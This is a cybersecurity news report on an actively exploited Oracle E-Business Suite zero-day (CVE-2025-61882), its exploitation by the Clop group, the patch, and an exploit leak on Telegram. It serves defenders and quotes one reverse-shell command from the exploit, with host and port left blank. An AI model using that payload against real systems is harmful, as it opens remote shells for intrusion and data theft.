Oracle EBS Zero-Day CVE-2025-61882 (CVSS 9.8) Being Actively Exploited by Clop Ransomware
Oracle has warned of a zero-day vulnerability in E-Business Suite, designated CVE-2025-61882, that permits unauthenticated remote arbitrary code execution. The flaw is already being actively exploited by the Clop group in data-theft operations, making it one of the most dangerous threats currently observed.
The vulnerability resides in the BI Publisher Integration component of the Oracle Concurrent Processing module. It received a CVSS score of 9.8/10, reflecting its critical severity. The root cause is a lack of authentication combined with trivial exploitability: an attacker may seize control of a system without knowing any credentials.
Oracle confirmed that affected versions span E-Business Suite 12.2.3 through 12.2.14 and released an emergency security update. However, installation of the patch requires the October 2023 bundle, a prerequisite that demands additional attention from administrators.
The urgency is driven by the public availability of an exploit and evidence of active exploitation. Oracle published warnings and indicators of compromise pointing to activity from IPs 200[.]107[.]207[.]26 and 185[.]181[.]60[.]11. The exploit spawns a reverse shell via the payload /bin/bash -i >& /dev/tcp// 0>&1, enabling attackers to execute commands directly.
Mandiant corroborated the situation: according to their analysis, Clop used this flaw in a data-theft campaign in August 2025, chaining multiple Oracle EBS vulnerabilities—some addressed in July’s patch—and the newly disclosed CVE-2025-61882.
The Clop surge became widely apparent when dozens of organizations received extortion emails threatening to publish exfiltrated material. Those messages claimed attackers had infiltrated corporate Oracle EBS systems and copied internal documents, databases, and confidential files, demanding ransom in exchange for non-publication.
Clop is notorious for large-scale intrusions that abuse zero-day flaws in widely used products. Past campaigns include the 2020 Accellion FTA incident, 2021’s SolarWinds Serv-U exploit, and the 2023 GoAnywhere MFT and MOVEit Transfer breaches— the latter affecting 2,773 organizations. In 2024, Clop exploited two Cleo MFT vulnerabilities (CVE-2024-50623 and CVE-2024-55956).
Notably, the Oracle EBS exploit was first published not by Clop but by another actor calling itself Scattered Lapsus$ Hunters, which posted a Telegram archive titled “ORACLE_EBS_NDAY_EXPLOIT_POC_SCATTERED_LAPSUS_RETARD_CL0P_HUNTERS.zip”. The archive contained two Python scripts (exp.py and server.py) and a readme.md with exploitation instructions. Oracle later confirmed that the archive matched the exploit referenced in its indicators of compromise.
In the same release, Scattered Lapsus$ Hunters shared an archive named “GIFT_FROM_CL0P.7z” allegedly containing fragments of Oracle source code purportedly obtained from support.oracle.com, raising questions about how the group accessed Clop’s tooling and whether the actors collaborated.
Oracle is urging all E-Business Suite administrators to apply the emergency update immediately and to audit systems for signs of compromise. Given the presence of a public exploit and active attacks, any delay risks complete loss of control over affected infrastructure.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
